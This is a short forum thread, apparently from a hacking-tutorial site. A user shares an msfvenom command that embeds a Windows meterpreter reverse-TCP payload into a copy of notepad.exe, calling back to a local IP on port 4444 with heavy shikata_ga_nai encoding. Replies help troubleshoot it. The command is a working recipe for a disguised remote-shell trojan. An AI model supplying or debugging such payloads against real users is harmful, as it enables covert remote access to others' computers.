I have copied notepad.exe form my Windows machine to Kali to use as a template and did this command msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.144 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 2000 -f exe > evil.exe When I transfer the evil.exe to my computer and run it I don't get a response from the file. I do have a handler running with said payload.
Anyhelp would be great, think I built this command wrong.
3 Responses
Could you possibly provide screenshots of the output from msfvenom?
-Defalt
https://gyazo.com/97588dc1ce7442d65dfdcd0d46e20473
Iterations here
https://gyazo.com/c46f8abad8fa7c9a3204d9f536574e5f
Also the typos weren't in the command I was running. I just typed it from looking at my SSH session so I didn't mean to do that.
Try with 10 itinerations xd .2000 is just too much
Share Your Thoughts